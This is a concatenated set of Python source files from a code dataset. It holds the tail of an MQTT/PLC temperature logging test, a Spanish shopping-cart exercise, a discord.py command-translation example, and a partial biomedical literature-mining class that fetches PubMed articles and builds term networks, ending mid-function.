fieldnames = ['name', \"value\", 'timestamp']\n # writer = csv.DictWriter(f, fieldnames=fieldnames)\n # if not file_exists:\n # writer.writeheader() # file doesn't exist yet, write a header\n # msg.payload = ast.literal_eval(msg.payload.decode(\"utf-8\"))\n # gw_temp={'name':'Temperature Gateway', \n # 'value': msg.payload['Temperature Gateway'],\n # 'timestamp':str(datetime.datetime.now().isoformat())}\n # print(gw_temp)\n # writer.writerow(gw_temp)\n # plc_temp={'name':'Temperature PLC', \n # 'value': float(self.ads_instance.read(var='GVL_default.el3202_ch1')/100),\n # 'timestamp':str(datetime.datetime.now().isoformat())}\n # print(plc_temp)\n # writer.writerow(plc_temp)\n fieldnames = ['Temperature Gateway', \"Temperature PLC\", 'timestamp']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n if not file_exists:\n writer.writeheader() # file doesn't exist yet, write a header\n msg.payload = ast.literal_eval(msg.payload.decode(\"utf-8\"))\n row={'Temperature Gateway': msg.payload['Temperature Gateway'], \n 'Temperature PLC': float(self.ads_instance.read(var='GVL_default.el3202_ch1')/100),\n 'timestamp':str(datetime.datetime.now().isoformat())}\n print(row)\n writer.writerow(row)\n except KeyboardInterrupt():\n print('Abort')\n self.mqtt_instance.stop_mqtt()\n self.mqtt_instance.disconnect()\n self.ads_instance.disconnect()\n\n def block_main_thread(self):\n while True:\n try:\n pass\n except KeyboardInterrupt():\n print('Abort')\n self.mqtt_instance.stop_mqtt()\n self.mqtt_instance.disconnect()\n self.ads_instance.disconnect()\n\n#%%\nif __name__ == '__main__':\n inst = temp_performance_test()","repo_name":"RWTH-EBC/OSIGBApp","sub_path":"PerformanceAnalysis/TemperatureGateway/TemperaturePerformanceTest.py","file_name":"TemperaturePerformanceTest.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29381766499","text":"p1 = [1, \"Pokemon X\", 33.77]\np2 = [2, \"Nintendo XL\", 203]\np3 = [3, \"Mario Kart 7\", 27.58]\np4 = [4, \"PlayStation 4\", 348.00]\np5 = [5, \"FIFA 16\", 51.19]\n\n# Dictionary to store cart\ncart = {}\n\n# Asking user choice for actions again and again\nwhile True:\n while True: # For validation that user enters only 1, 2 or 3\n print(''' Escribe VER para ver el producto\n Escribe CART para mostrar el carrito\n Escribe CHECKOUT para pagar''')\n print()\n choice = input('Ingresar decisión: ')\n if choice in ('ver', 'cart', 'checkout'):\n print()\n break\n else:\n print('Favor ingresar la decisión correcta')\n print()\n\n if choice == 'ver': # If choice is 1 then add products to cart\n print('''Ingrese el Número de producto y la cantidad de producto como número_producto.cantidad\n 1: Pokemon X Game para Nintendo 3DS\n 2: Nintendo 3DS XL\n 3: Mario Kart 7 Game para Nintendo 3DS\n 4: PlayStation 4\n 5: FIFA 16, PlayStation 4''')\n\n while True: # Validation to check if user asks correct input like 5.2\n product = input('Ingrese el número y la cantidad del producto como número_producto.cantidad (ejemplo 5,2):')\n check_list = product.split('.')\n if ((len(check_list) == 2) and (check_list[0] in ['1', '2', '3', '4', '5'])):\n\n if check_list[0] not in cart: # If entered format is correct then add to cart\n cart[check_list[0]] = int(check_list[1])\n else:\n cart[check_list[0]] += int(check_list[1])\n print()\n break\n else:\n print('Ingresar la decisión en el formato correcto')\n print()\n\n\n elif choice == 'cart': # If choice is 2, then print cart items\n print('Items actuales en el carrito:')\n for item in cart:\n if item == '1':\n precio = cart[item] * p1[2]\n print('Cantidad:', cart[item], '-- Item:', p1[1], '-- Precio: $', round(precio, 1))\n elif item == '2':\n precio = cart[item] * p2[2]\n print('Cantidad:', cart[item], '-- Item:', p2[1], '-- Precio: $', round(precio, 1))\n elif item == '3':\n precio = cart[item] * p3[2]\n print('Cantidad:', cart[item], '-- Item:', p3[1], '-- Precio: $', round(precio, 1))\n elif item == '4':\n precio = cart[item] * p4[2]\n print('Cantidad:', cart[item], '-- Item:', p4[1], '-- Precio: $', round(precio, 1))\n elif item == '5':\n precio = cart[item] * p5[2]\n print('Cantidad:', cart[item], '-- Item:', p5[1], '-- Precio: $', round(precio, 1))\n print()\n\n\n elif choice == 'checkout': # If choice is 3, then print checkout price along with discount and total and end the program\n total = 0\n print('Precios a pagar')\n for item in cart:\n if item == '1':\n precio = cart[item] * p1[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p1[1], '-- Precio: $', round(precio, 1))\n elif item == '2':\n precio = cart[item] * p2[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p2[1], '-- Precio: $', round(precio, 1))\n elif item == '3':\n precio = cart[item] * p3[2]\n precio = precio - (0.2 * precio)\n print('Cantidad:', cart[item], '-- Item:', p3[1], '-- Precio: $', round(precio, 1))\n elif item == '4':\n precio = cart[item] * p4[2]\n precio = precio - (0.15 * precio)\n print('Cantidad:', cart[item], '-- Item:', p4[1], '-- Precio: $', round(precio, 1))\n elif item == '5':\n precio = cart[item] * p5[2]\n precio = precio - (0.15 * precio)\n print('Cantidad:', cart[item], '-- Item:', p5[1], '-- Precio: $', round(precio, 1))\n\n total += precio\n print('Precio total: $', round(total, 1))\n break","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej4/hito2_ej4_746f3954487ab1b6e5d473d51e75a7fc.py","file_name":"hito2_ej4_746f3954487ab1b6e5d473d51e75a7fc.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31319201338","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\n\nimport discord\nfrom discord import app_commands\n\nfrom dpy_toolbox import Bot, translating\n\nbot = Bot(command_prefix='!', intents=discord.Intents.all(), auto_sync=True)\nTOKEN = '' # BAD\n\n# language: command name: ...\nTRANSLATION_TABLE = {\n \"hey\": {\n \"default\": \"en\",\n \"en\": {\n \"name\": \"hello\",\n \"description\": \"say hello\"\n },\n \"de\": {\n \"name\": \"hallo\",\n \"description\": \"sage hallo\"\n },\n },\n \"add\": {\n \"en\": {\n \"name\": \"add\",\n \"params\": {\n \"number1\": {\n \"name\": \"first_number\",\n },\n }\n },\n \"de\": {\n \"name\": \"addieren\",\n \"description\": \"addiere zwei nummern\",\n \"params\": {\n \"number1\": {\n \"name\": \"erste_number\",\n },\n \"number2\": {\n \"name\": \"zweite_nummer\",\n \"description\": \"die zweite nummer\"\n }\n }\n }\n }\n}\n\n\n@bot.tree.command()\nasync def hey(inter: discord.Interaction) -> None:\n await inter.response.send_message(f\"Hello {inter.user.mention}!\")\n\n\n\"\"\"\nin this example no default lang is set therefore the \n if there is no translation for\n the command's name the function name (here \"add\") will be used\n the command's description the by discord.py provided default (\"...\") will be used\n a command's param the description defined using the describe decorator will be used\n\"\"\"\n\n\n@bot.tree.command()\n@app_commands.describe(number1=\"the first number\", number2=\"the second number\")\nasync def add(inter: discord.Interaction, number1: int, number2: int) -> None:\n await inter.response.send_message(f\"The solution is: `{number1 + number2}`!\")\n\n\n@bot.event\nasync def on_ready() -> None:\n print(f'Running as {bot.user}')\n\nif __name__ == '__main__':\n asyncio.run(bot.tree.set_translator(translating.DictonaryTranslator(TRANSLATION_TABLE)))\n bot.run(TOKEN)\n","repo_name":"TheWever/dpy-toolbox","sub_path":"examples/dict_translator.py","file_name":"dict_translator.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74344626807","text":"import warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport treetaggerwrapper\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport re, regex, string, random, json, requests, sys, os, hashlib, time, datetime\nfrom collections import OrderedDict \nfrom operator import itemgetter\nimport mysql.connector\nfrom xml.etree import ElementTree\nimport fitz\nfrom scipy import spatial\nimport math \nimport nltk.data\nimport spacy\nfrom spacy.symbols import VERB\nfrom spacy.matcher import Matcher\nfrom lxml import etree\nfrom itertools import chain\n\n\nclass NetBuilder:\n\tstop_words = set(stopwords.words('english')) \n\tsent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n\tnlp = spacy.load(\"en_core_web_sm\")\n\t#nlp.add_pipe(\"merge_entities\")\n\t#nlp.add_pipe(\"merge_noun_chunks\")\n\tnlp.add_pipe(nlp.create_pipe(\"merge_entities\"))\n\tnlp.add_pipe(nlp.create_pipe(\"merge_noun_chunks\"))\n\tnegation = None\n\tconjunction = None\n\tbioterms = None\n\tnet = None\n\tannotations = None\n\tclassifier = None;\n\twebserver_url = \"http://131.114.50.197/tagme_string\";\n\t#webserver_url = \"http://161.97.160.81/tagme_string\";\n\tarticles = {}\n\tpath = \"/var/www/html/netme/py/\";\n\ttagger = None\n\tcleaned_text = {}\n\tsearchid = None\n\tdebug = False\n\tpost_data = None\n\ttagger = None\n\tarticles_id = []\n\tapikey = \"9fa42ec62c582485fb7e6c69148eaf940308\"\n\t\n\tdef __init__(self):\t\n\t\tif(len(sys.argv) < 1):\n\t\t\tprint('')\n\t\t\texit()\n\t\tself.db_connect()\n\t\tself.tagger = treetaggerwrapper.TreeTagger(TAGLANG='en')\n\t\tself.searchid = sys.argv[1]\n\t\t## get searchid, data information are stored in request table\n\t\ttry:\n\t\t\tif sys.argv[2]: self.debug = True \n\t\texcept IndexError:\n\t\t\tself.debug = False\n\n\t\tself.bioterms = self.get_bioterms()\n\t\tself.conjunction = self.get_conjunctionterms()\n\t\tself.negation = self.get_negationterms()\n\t\tself.reset_log()\n\t\tself.write_log(\"Starting parsing operation\")\n\t\t\n\t\t#GET POST_DATA\n\t\tself.post_data = self.get_request()\n\t\t#self.post_data = json.loads(self.post_data['data'])\n\t\t\n\t\tprint(self.post_data)\n\t\t\n\t\tif self.post_data:\n\t\t\t#FREETEXT\n\t\t\tif self.post_data['freetext'] is not None and self.post_data['freetext']:\n\t\t\t\tself.articles = json.loads('{\"freetext\": \"'+self.json_string(self.post_data['freetext'])+'\"}')\n\t\t\t\tself.articles_id.append(\"freetext\")\n\t\t\t\n\t\t\t#PMC\n\t\t\tif self.post_data['pmc_terms'] is not None and len(self.post_data['pmc_terms']) > 0:\n\t\t\t\t#split query terms by ;\n\t\t\t\tquery = self.post_data['pmc_terms'].split(\";\")\n\t\t\t\tfor q in query:\n\t\t\t\t\tself.articles_fetch(self.terms_search(q, \"pmc\"), \"pmc\")\n\t\t\t\t\n\t\t\t#PMC IDLIST\n\t\t\tif self.post_data['pmc_id'] is not None and len(self.post_data['pmc_id'].split(\",\")) > 0:\n\t\t\t\tself.post_data['pmc_retmax'] = len(self.post_data['pmc_id'].split(\",\"))\n\t\t\t\tself.articles_fetch(self.post_data['pmc_id'].split(\",\"), \"pmc\")\n\t\t\t\n\t\t\t#PM\n\t\t\tif self.post_data['pubmed_terms'] is not None and len(self.post_data['pubmed_terms']) > 0:\n\t\t\t\t#split query terms by ;\n\t\t\t\tquery = self.post_data['pubmed_terms'].split(\";\")\n\t\t\t\tfor q in query:\n\t\t\t\t\tself.articles_fetch(self.terms_search(q, \"pubmed\"), \"pubmed\")\n\t\t\t\t\n\t\t\t#PM IDLIST\n\t\t\tif self.post_data['pubmed_id'] is not None and len(self.post_data['pubmed_id'].split(\",\")) > 0:\n\t\t\t\tself.post_data['pubmed_retmax'] = len(self.post_data['pubmed_id'].split(\",\"))\n\t\t\t\tself.articles_fetch(self.post_data['pubmed_id'].split(\",\"), \"pubmed\")\n\t\t\t\n\t\t\t#PDF\n\t\t\tpdf_path = self.path+\"pdf/\"\n\t\t\tfor filename in os.listdir(pdf_path):\n\t\t\t\tif filename.startswith(self.searchid):\n\t\t\t\t\tself.articles[\"pdf|\"+filename.replace(self.searchid+'_', '')] = self.parse_pdf(pdf_path+filename)\n\t\t\t\t\tself.articles_id.append(\"pdf|\"+filename.replace(self.searchid+'_', ''))\n\t\t\t\n\t\t\t# self.articles array contains articles fulltext, self.articles_id contains id list (format {ORIGIN_TYPE}|{id} example pdf|5.pdf, pmc|142341234, etc)\n\t\t\t\n\t\t\tif (self.articles) :\n\t\t\t\tself.net = {'edges': [], 'nodes': []}\n\t\t\t\tself.annotations = {'article': {}, 'spot_list':{}, 'word_list':{}}\n\t\t\t\tself.make_net()\n\t\t\telse:\n\t\t\t\tprint('')\n\t\telse:\n\t\t\tprint('')\n\n\t\t\n\t################# PMC SEARCH #################\n\t\n\tdef terms_search(self, terms, dbtype = \"pmc\"):\n\t\ttry:\n\t\t\tidlist = []\n\t\t\tterms = terms+\"+AND+free+fulltext[filter]\" if (dbtype == \"pmc\") else terms\n\t\t\tretmax = int(self.post_data[dbtype+'_retmax'])\n\t\t\tsort = self.post_data[dbtype+'_sort']\n\t\t\turl_search = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?apikey=\"+self.apikey+\"&db=\"+dbtype+\"&term=\"+terms+\"&retmax=\"+str(retmax*4)+\"&sort=\"+sort\n\t\t\tr = requests.get(url = url_search, params = '') \n\t\t\tr = ElementTree.fromstring(r.content)\n\t\t\tfor id_list_tag in r.findall('IdList'):\n\t\t\t\tfor id_article_tag in id_list_tag.findall('Id'):\n\t\t\t\t\tidlist.append(id_article_tag.text)\n\t\t\treturn idlist\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in terms_search: \"+str(e))\n\t\t\treturn ''\n\t\t\t\n\tdef articles_fetch_old(self, idlist, dbtype = \"pmc\"):\n\t\ttry:\n\t\t\tcount = 0\n\t\t\turl_fetch = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi\"\n\t\t\tkey = dbtype+'_obj'\n\t\t\tretmax = int(self.post_data[dbtype+'_retmax'])\n\t\t\tn_cycle = (len(idlist) // 100) + 1\n\t\t\tfor n in range(n_cycle):\n\t\t\t\t_idlist = ','.join(idlist[(n*100):((n+1)*100)])\n\t\t\t\tpar = {\n\t\t\t\t\t'db': dbtype,\n\t\t\t\t\t'id': _idlist,\n\t\t\t\t\t'retmode' : 'xml',\n\t\t\t\t\t'apikey' : self.apikey,\n\t\t\t\t}\n\t\t\t\tr = requests.post(url = url_fetch, params = par) \n\t\t\t\tr = ElementTree.fromstring(r.content)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif(dbtype == \"pmc\"):\n\t\t\t\t\tfor article_tag in r.findall('article'):\n\t\t\t\t\t\tfor body_tag in article_tag.findall('body'):\n\t\t\t\t\t\t\tcontent = ''\t\t\t\t\t\t\n\t\t\t\t\t\t\tfor p_tag in body_tag.iter('p'):\n\t\t\t\t\t\t\t\tif p_tag.text:\n\t\t\t\t\t\t\t\t\tcontent+= p_tag.text\n\t\t\t\t\t\t\tarticle_id = article_tag.find(\".//article-id[@pub-id-type='pmc']\")\n\t\t\t\t\t\t\tif article_id.text and len(content) > 100 and \"pmc|\"+article_id.text not in self.articles_id:\n\t\t\t\t\t\t\t\tself.articles[\"pmc|\"+article_id.text] = content.replace('\\n', '')\n\t\t\t\t\t\t\t\tself.articles_id.append(\"pmc|\"+article_id.text)\n\t\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\t\tif count >= retmax:\n\t\t\t\t\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tfor article_tag in r.findall('PubmedArticle'):\n\t\t\t\t\t\tcontent = ''\n\t\t\t\t\t\tfor abstract_tag in article_tag.findall('.//AbstractText'):\n\t\t\t\t\t\t\tif abstract_tag.text:\n\t\t\t\t\t\t\t\tcontent+= abstract_tag.text\n\t\t\t\t\t\tarticle_id = article_tag.find(\".//PMID\")\n\t\t\t\t\t\tif article_id.text and len(content) > 100 and \"pubmed|\"+article_id.text not in self.articles_id:\n\t\t\t\t\t\t\tself.articles[\"pubmed|\"+article_id.text] = content.replace('\\n', '')\n\t\t\t\t\t\t\tself.articles_id.append(\"pubmed|\"+article_id.text)\n\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\tif count >= retmax: \n\t\t\t\t\t\t\t\treturn\n\t\t\treturn\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in articles_fetch: \"+str(e))\n\t\t\treturn\n\t\n\tdef stringify_children(self, node):\n\t\t\"\"\"\n\t\tFilters and removes possible Nones in texts and tails\n\t\t\"\"\"\n\t\tif node is not None:\n\t\t\tparts = (\n\t\t\t\t[node.text]\n\t\t\t\t+ list(chain(*([c.text, c.tail] for c in node.getchildren())))\n\t\t\t\t+ [node.tail]\n\t\t\t)\n\t\t\treturn \"\".join(filter(None, parts))\n\t\treturn \"\"\n\t\n\tdef pubmed_parser(self, response):\n\t\tfor article_tag in response.findall('PubmedArticle'):\n\t\t\tarticle_id = article_tag.find(\".//PMID\")\n\t\t\tif not article_id.text: continue\n\t\t\tcontent = ''\n\t\t\tfor abstract_tag in article_tag.findall('.//AbstractText'):\n\t\t\t\tif abstract_tag.text:\n\t\t\t\t\tcontent += abstract_tag.text\n\t\t\tif not (len(content) > 100 and article_id.text not in self.articles) : continue\n\t\t\tself.articles[article_id.text] = content.replace('\\n', '')\n\t\t\tself.articles_id.append(\"pubmed|\"+article_id.text)\n\n\tdef pubmed_central_parser(self, response):\n\t\tfor article_tag in response.findall('article'):\n\t\t\tarticle_meta = article_tag.find(\".//article-meta\")\n\t\t\tarticle_id = article_meta.find('article-id[@pub-id-type=\"pmc\"]')\n\t\t\tif not article_id.text: continue\n\t\t\tcontent = self.parse_pubmed_paragraph(article_tag)\n\t\t\tif not (len(content) > 100 and article_id.text not in self.articles): continue\n\t\t\tself.articles[article_id.text] = content.replace('\\n', '')\n\t\t\tself.articles_id.append(\"pmc|\"+article_id.text)\n\t\n\tdef parse_pubmed_paragraph(self, article_tag):\n\t\tdict_pars = list()\n\t\tfor paragraph in article_tag.findall(\".//body//p\"):\n\t\t\tparagraph_text = self.stringify_children(paragraph)\n\t\t\tif paragraph_text != '':\n\t\t\t\tdict_pars.append(paragraph_text)\n\n\t\ttxt = \"\".join(dict_pars)\n\t\ttxt = re.sub('\\\\s+', ' ', txt)\n\t\treturn txt\n\t\n\tdef sub_list(self, idlist, n, retmax, sup, len_id_list):\n\t\treturn idlist[n * retmax: sup] if sup < len_id_list else idlist[n * retmax:]\n\n\tdef articles_fetch(self, idlist, apikey, retmax=20, dbtype=\"pmc\"):\n\t\t#self.articles = dict()\n\t\ttry:\n\t\t\turl_fetch = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi\"\n\t\t\tlen_id_list = len(idlist)\n\t\t\tfor n in range((len_id_list // retmax) + 1):\n\t\t\t\tsup = (n + 1) * retmax\n\t\t\t\tpar = {\n\t\t\t\t\t'db' : dbtype,\n\t\t\t\t\t'id' : ','.join(self.sub_list(idlist, n, retmax, sup, len_id_list)),\n\t\t\t\t\t'retmode': 'xml',\n\t\t\t\t\t'apikey' : apikey,\n\t\t\t\t}\n\t\t\t\tr = requests.post(url=url_fetch, params=par)\n\t\t\t\tif dbtype == \"pmc\":\n\t\t\t\t\tr = etree.fromstring(r.content, parser=etree.XMLParser(huge_tree=True))\n\t\t\t\telse:\n\t\t\t\t\tr = ElementTree.fromstring(r.content)\n\t\t\t\tself.pubmed_central_parser(r) if dbtype == \"pmc\" else self.pubmed_parser(r)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tself.write_log(\"Error in articles_fetch: \"+str(e))\n\t\t\treturn None\n\t\n\t\n\t\t\t\n\t################# PDF PARSER #################\n\t\n\tdef parse_pdf(self, file):\n\t\ttry:\n\t\t\tarticle = '';\n\t\t\tdoc = fitz.open(file)\n\t\t\tpage_count = doc.pageCount\n\t\t\tmetadata = doc.metadata\n\t\t\t\n\t\t\t# page creation\n\t\t\tpages_blocks = dict()\n\t\t\tduplicate_blk = dict()\n\t\t\tfor page in range(0, page_count):\n\t\t\t\tpage_i = doc.loadPage(page)\n\t\t\t\tfor block in page_i.getText(\"blocks\"):\n\t\t\t\t\tblock_coords = block[0:4]\n\t\t\t\t\tif block_coords not in pages_blocks:\n\t\t\t\t\t\tpages_blocks[block_coords] = dict()\n\t\t\t\t\t\tpages_blocks[block_coords][page] = block[4:6]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif block_coords not in duplicate_blk:\n\t\t\t\t\t\t\tduplicate_blk[block_coords] = {\"count\": 0, \"testo\": block[4:6]}\n\t\t\t\t\t\tduplicate_blk[block_coords][\"count\"] += 1\n\n\t\t\tfor key in duplicate_blk:\n\t\t\t\tif duplicate_blk[key][\"count\"] > 2:\n\t\t\t\t\tpages_blocks.pop(key)\n\n\t\t\tfor block in pages_blocks:\n\t\t\t\tfor text in pages_blocks[block]:\n\t\t\t\t\t#article+= pages_blocks[block][text][0].replace('\\n', ' ')\n\t\t\t\t\tarticle+= pages_blocks[block][text][0].replace('\\n', ' ').strip().replace(' ', ' ')+'. '\n\t\t\t#os.remove(file)\n\t\t\treturn article\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in parse_pdf: \"+str(e))\n\t\t\treturn article\n\t\t\t\n\tdef json_string(self, string):\n\t\tstring = string.replace('\\r\\n', ' ')\n\t\tstring = string.replace('\\r', '')\n\t\tstring = string.replace('\\n', '')\n\t\t#string = string.replace(\"'\", \"\\'\")\n\t\tstring = string.replace('\\\"', '')\n\t\treturn string\t\t\n\t\n\t######### NETWORK ################\n\t\n\tdef make_net(self):\n\t\tsentences_list = {}\n\t\tfor index, id_article in enumerate(self.articles):\n\t\t\tself.write_log(\"ANNOTATING \"+str(index+1)+\" of \"+str(len(self.articles))+\" articles\")\n\t\t\t#Tokenize article by period and re-join (Remove extra space between period)\n\t\t\tsentences_list[id_article] = self.sent_detector.tokenize(self.articles[id_article])\n\t\t\tself.articles[id_article] = ''.join(sentences_list[id_article])\n\t\t\tself.request_data(id_article, self.articles[id_article])\n\t\tfor index_article, id_article in enumerate(self.annotations[\"article\"]):\n\t\t\tsentence_start = 0\n\t\t\ttotal_words = len(re.findall(r'\\w+', self.articles[id_article]))\n\t\t\tfor sentence in sentences_list[id_article]:\n\t\t\t\tsentence_end = sentence_start + len(sentence) -1\n\t\t\t\tspot_list = []\n\t\t\t\tfor index_annotation, annotation in enumerate(self.annotations[\"article\"][id_article]):\n\t\t\t\t\tif annotation >= sentence_start and annotation < sentence_end:\n\t\t\t\t\t\tspot_list.append(self.annotations[\"article\"][id_article][annotation])\n\t\t\t\tself.find_edges(id_article, sentence, spot_list, total_words)\n\t\t\t\tsentence_start = sentence_end\n\t\tfor e in range(len(self.net['edges'])):\n\t\t\tbio = self.check_bio_edge(self.net['edges'][e]['data']['label'].replace(\"not \", \"\"))\n\t\t\tself.net['edges'][e]['data']['bio'] = bio\n\t\t\tself.net['edges'][e]['data']['aid'] = list(self.net['edges'][e]['data']['aid'])\n\t\t\t#calc weight\n\t\t\ttf_medium = 0\n\t\t\tfor index, id_article in enumerate(self.net['edges'][e]['data']['tf']):\n\t\t\t\ttf_medium+= self.net['edges'][e]['data']['tf'][id_article]['tf']/self.net['edges'][e]['data']['tf'][id_article]['total_words']\n\t\t\ttf = tf_medium/len(self.net['edges'][e]['data']['tf'])\n\t\t\tidf = math.log(len(self.articles)/len(self.net['edges'][e]['data']['tf']))\n\t\t\tself.net['edges'][e]['data']['weight'] = tf*idf if idf > 0 else tf\n\t\tself.net['nodes'] = sorted(self.net['nodes'], key=lambda x: x['data']['size'], reverse=True)\n\t\tself.reset_log()\n\t\tdump = {'annotations': self.annotations, 'nodes': self.net['nodes'], 'edges': self.net['edges'], 'articles': self.articles_id}\n\t\tdump = json.dumps(dump, default=self.set_default)\n\t\tprint(dump)\n\t\tself.save_dump(dump)\n\t\t\n\tdef set_default(self, obj):\n\t\tif isinstance(obj, set):\n\t\t\treturn list(obj)\n\t\traise TypeError\n\t\n\t################# ANNOTATION ########################\n\t\n\tdef response_replace(rp):\n\t\treturn rp.replace('\\n', \" \") \\\n .replace(\"\\\\'\", \"'\") \\\n .replace('\\\"', '\"') \\\n .replace('\\\\', \"\")\n\t\n\tdef request_data(self, id_article, article):\n\t\ttry:\n\t\t\tdata = None\n\t\t\tannotations = self.get_annotations(id_article)\n\t\t\tif annotations:\n\t\t\t\ttry:\n\t\t\t\t\tdata = json.loads(annotations['data'])\n\t\t\t\t\tif data:\n\t\t\t\t\t\tself.save_annotations(id_article, data)\n\t\t\t\t\t\treturn\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tdata = None\n\t\t\tpar = {'name': article}\n\t\t\tr = requests.post(url = self.webserver_url, data = par, timeout=1800)\n\t\t\t#data = json.loads(response_replace(r.content.decode('utf-8')))\n\t\t\tdata = r.json() \n\t\t\tif data['response']:\n\t\t\t\tself.save_annotations_db(id_article, json.dumps(data['response']))\n\t\t\t\tself.save_annotations(id_article, data['response'])\n\t\t\treturn\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in request_data: \"+str(e))\n\n\tdef save_annotations(self, id_article, data):\n\t\tself.annotations['article'][id_article] = {}\n\t\tfor key, annotation in enumerate(data):\n\t\t\t#store in annotation word_list and spot_list\n\t\t\ttry:\n\t\t\t\tif(len(annotation[\"categories\"]) == 0):\n\t\t\t\t\tannotation[\"categories\"] = [\"other\"]\n\t\t\t\tif(len(annotation[\"categories\"]) > 0 and annotation[\"categories\"][0] == ''):\n\t\t\t\t\tannotation[\"categories\"] = [\"other\"]\n\t\t\t\tif(annotation[\"Word\"] in self.annotations['word_list']):\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]]['count']+= 1\n\t\t\t\telse:\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]] = annotation.copy()\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]]['count'] = 1\n\t\t\t\t#store in annotation spot_list\n\t\t\t\tif(annotation[\"spot\"] in self.annotations['spot_list']):\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]]['count']+= 1\n\t\t\t\telse:\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]] = annotation.copy()\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]]['count'] = 1\n\t\t\t\t#store in annotation list by article\n\t\t\t\tself.annotations['article'][id_article][annotation[\"start_pos\"]] = annotation.copy();\n\t\t\t\tself.write_log(\"Save annotation: \"+annotation[\"Word\"])\t\n\t\t\texcept Exception as e:\n\t\t\t\tself.write_log(\"Error in save_annotations: \"+str(e))\t\n\t\n\tdef clean_token(self, token):\n\t\ttoken = token.replace('NOT_', 'not ')\n\t\tnot_alpha = re.findall(r'[^a-zA-Z\\d\\s:]', token)\n\t\tif len(not_alpha) > 0 or len(token) < 3:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn token\n\t\n\t############## EDGES ANALYSIS ##################\n\t\n\tdef find_edges(self, id_article, sentence, spot_list, total_words):\n\t\tself.write_log(\"FINDING edges for: \"+sentence)\n\t\tdoc = self.nlp(sentence)\n\t\tverbs = {}\n\t\tfor w in doc:\n\t\t\tif w.pos == VERB:\n\t\t\t\tverbs[w.text] = []\n\t\t\t\tself.recoursive_search(w, w.text, verbs, 0)\n\t\tfor v in verbs:\n\t\t\tsub = None\n\t\t\tdob = None\n\t\t\tfor s in spot_list:\n\t\t\t\tfor e in verbs[v]:\n\t\t\t\t\tif s[\"spot\"] in e:\n\t\t\t\t\t\tif sub is not None:\n\t\t\t\t\t\t\tdob = s\n\t\t\t\t\t\t\tif self.passive_form(sentence):\n\t\t\t\t\t\t\t\tself.save_edge(id_article, dob, sub, v, total_words, sentence)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.save_edge(id_article, sub, dob, v, total_words, sentence)\n\t\t\t\t\t\t\tdob = None\n\t\t\t\t\t\tif sub is None:\n\t\t\t\t\t\t\tsub = s\n\t\t\t\t\t\n\tdef recoursive_search(self, el, verb, verbs, count):\n\t\tcount+=1\n\t\tif count > 2:\n\t\t\treturn\n\t\tfor child in el.children:\n\t\t\tverbs[verb].append(child.text)\n\t\t\tself.recoursive_search(child, verb, verbs, count)\n\t\n\tdef passive_form(self, sentence):\n\t\tmatcher = Matcher(self.nlp.vocab)\n\t\tdoc = self.nlp(sentence)\n\t\tpassive_rule = [{'DEP':'nsubjpass'},{'DEP':'aux','OP':'*'},{'DEP':'auxpass'},{'TAG':'VBN'}]\n\t\tmatcher.add('Passive', [passive_rule])\n\t\tmatches = matcher(doc)\n\t\tif len(matches):\n\t\t\treturn True\n\t\treturn False\n\t\t\n\t\n\tdef check_exception(self, sentence):\n\t\t#check parentheses\n\t\tis_an_exception = False\n\t\tparentheses = [\"{\", \"[\", \"(\", \")\", \"]\", \"}\"]\n\t\tif any(x in sentence for x in parentheses):\n\t\t\tresult = regex.search(r'''(?\\((?:[^()]++|(?&rec))*\\))''',sentence,flags=regex.VERBOSE)\n\t\t\tif result is not None:\n\t\t\t\tis_an_exception = False\n\t\t\telse:\n\t\t\t\tis_an_exception = True\n\t\telse:\n\t\t\tis_an_exception = False\n\t\t#check ,\n\t\tif \",\" in sentence or \";\" in sentence:\n\t\t\tis_an_exception = True\n\t\treturn is_an_exception\n\t\n\tdef check_bio_edge(self, edge):\n\t\tscore = len(edge);\n\t\tfor e in self.bioterms:\n\t\t\tif nltk.edit_distance(e, edge) < score:\n\t\t\t\tscore = nltk.edit_distance(e, edge)\n\t\ttry:\n\t\t\tnormalized_score = score/len(edge)\n\t\texcept:\n\t\t\tnormalized_score = 999\n\t\treturn round(normalized_score, 3)\n\t\t\n\t\t\n\tdef save_edge(self, id_article, spot1, spot2, edge_label, total_words, sentence):\n\t\ttry:\n\t\t\tfoundn1 = False\n\t\t\tfoundn2 = False\n\t\t\t# n1 = 